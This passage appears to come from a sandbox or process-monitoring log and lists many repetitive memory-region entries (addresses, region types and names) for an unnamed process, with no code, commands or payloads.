"pagefile_0x0000000000610000" filename = "" Region: id = 4444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4445 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4448 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4449 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4452 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4453 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4454 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4455 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4456 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4457 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4458 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4459 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4460 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4461 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4462 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4463 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4464 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4465 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4466 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4467 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4468 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4469 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4470 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4471 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4473 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4474 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4475 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4476 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4477 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4478 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4479 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4480 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4481 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4482 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4486 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4487 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4488 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4489 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4490 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4491 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4492 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4493 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4494 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4495 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4496 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4497 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4498 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4499 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4500 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4501 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4502 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4503 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4504 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4505 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4506 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4507 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4508 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4509 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4510 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4511 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4526 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4527 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4528 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4529 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4530 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4531 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4532 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4533 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4534 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4535 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4536 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4537 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4538 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4539 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4540 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4541 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4542 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4543 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4544 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4545 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4546 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4547 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4548 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4549 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4550 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4551 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4552 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4553 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4554 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4555 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4556 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4557 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4558 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4559 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4560 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4561 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4562 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4563 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4564 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4565 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4566 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4567 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4568 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4573 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4577 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4578 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4580 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4581 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4582 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4586 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4587 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4588 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4590 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4591 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4592 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4593 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4594 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4597 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4598 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4599 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4600 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4601 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4602 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4603 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4604 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4605 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4606 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4607 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4608 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4609 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4610 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4611 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4612 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4613 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4614 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4615 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4616 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4621 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4622 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4623 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4624 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4625 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4626 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4627 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4631 start_va = 0x610000 end_va = 